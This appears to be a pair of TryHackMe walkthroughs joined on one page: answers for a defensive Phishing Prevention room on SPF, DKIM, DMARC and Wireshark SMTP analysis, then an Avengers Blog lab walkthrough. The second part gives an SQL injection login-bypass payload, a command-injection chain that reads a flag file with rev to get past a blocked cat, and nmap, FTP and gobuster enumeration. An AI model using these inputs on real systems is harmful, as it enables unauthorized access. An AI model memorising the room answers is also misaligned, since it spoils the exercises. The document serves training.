TryHackMe - Phishing Prevention room

 TryHackMe - Phishing Prevention room

Phishing Prevention is the fourth room in TryHackMe’s Phishing Analysis module under the SOC Level 1 path. If you're working through the room and get stuck, this guide provides clear hints and answers to help you progress without frustration.

Task 2

Q1 Based on TryHackMe's SPF record above, how many domains are authorized to send email on its behalf?

3

Q2 What is the intended action of an email that returns a SoftFail verification result?

Flag

Task 3

Q1 Based on the sample header above, what is the reason for the permerror?

no key for signature

Task 4

Q1 Which DMARC policy provides the greatest amount of protection by blocking emails that fail the DMARC check?

p=reject

Task 5

Q1  Which S/MIME component ensures that only the intended recipient can read the contents of an email message?

Can be found in description of the task - encryption

Task 6

Q1 Which Wireshark filter can you use to narrow down your results based on SMTP response codes?

smtp.response.code

Q2 How many packets in the capture contain the SMTP response code 220 Service ready?

19

Q3 One SMTP response indicates that an email was blocked by spamhaus.org. What response code did the server return?

553

Q4 Based on the packet from the previous question, what is the full Response code: message?

Requested action not taken: mailbox name not allowed (553)

Q5 Search for response code 552. How many messages were blocked for presenting potential security issues?

6

Task 7 

Q1 How many SMTP packets are available for analysis? 

FIlter pcap file for smtp traffic and count of them is your answer

Q2  What is the name of the attachment in packet 270?

I was sorting the packets by id/number and search for 270 and checked for Line-based text data and seen it there. 

Or use option ctrl g and enter the number and go to that packet.

Q3 According to the message in packet 270, which Host IP address is not responding, making the message undeliverable?

You can read through the email content and find the correct IP

Q4 By filtering for imf, which email client was used to send the message containing the attachment attachment.scr?

filter by imf and then look through emails for which email contains the attachment.

Q5  Which type of encoding is used for this potentially malicious attachment?

Answer can be found information under Content-Transfer-Encoding 

Task 8 

Q1 A security team wants to implement a control to detect hidden malware inside email attachments.
They need a way to analyze suspicious files without risking infection on real systems.
Which protective technique would allow them to observe a file's behavior safely?

Answer can be found in explanation part of this task - Sandboxing

TryHackMe Avengers Blog

Hi, 

This is write up for THM Avengers room on TryHackMe

Task 2 Cookies

Open the Browser and open dev tools and check storage and check the value for the cookie,

Task 3 HTTP Headers

Also for this one you will use developer tools and check the networking headers and there you ifnd the flag

Task 4 Enumeration and FTP

nmap -sv VM_IP

we can see that ftp is opened

Open cli and enter ftp vm_ip log to the ftp service with provided username and password.

1. You then try to list the files and directories with dir or ls command 
2. move to directory with cd dir_name
3. list files in dir_name 
4. use command get file_name to download the file
5. on your attackbox open the file and you get flag3

230 Login successful.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> ls

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.

drwxr-xr-x    2 1001     1001         4096 Oct 04  2019 files

226 Directory send OK.

ftp> cd files

250 Directory successfully changed.

ftp> ls

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.

-rw-r--r--    1 0        0              33 Oct 04  2019 flag3.txt

226 Directory send OK.

ftp> get flag3.txt

local: flag3.txt remote: flag3.txt

Task 5 GoBuster

For this task I ran following gobuster command to find the answer for this task:

gobuster dir -t 40 -u VM_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

Task 6 SQL Injection

Make sure you enter the same payload for username and password

username  :-    ' or 1=1 -- -
password  :-    ' or 1=1 -- -

Task 7 Remote Code Execution and Linux 

For this task you try using command:

cd ../; ls; cat flag5.txt

but you see that cat command is disallowed as well as head, tail and others I started to google and found rev utility which  copies the specified files to standard output, reversing the order of characters in every line

With this command we get the flag in reverse order so we need to copy it to attackbox command and reverese it again

echo "reversed_flag_string" | rev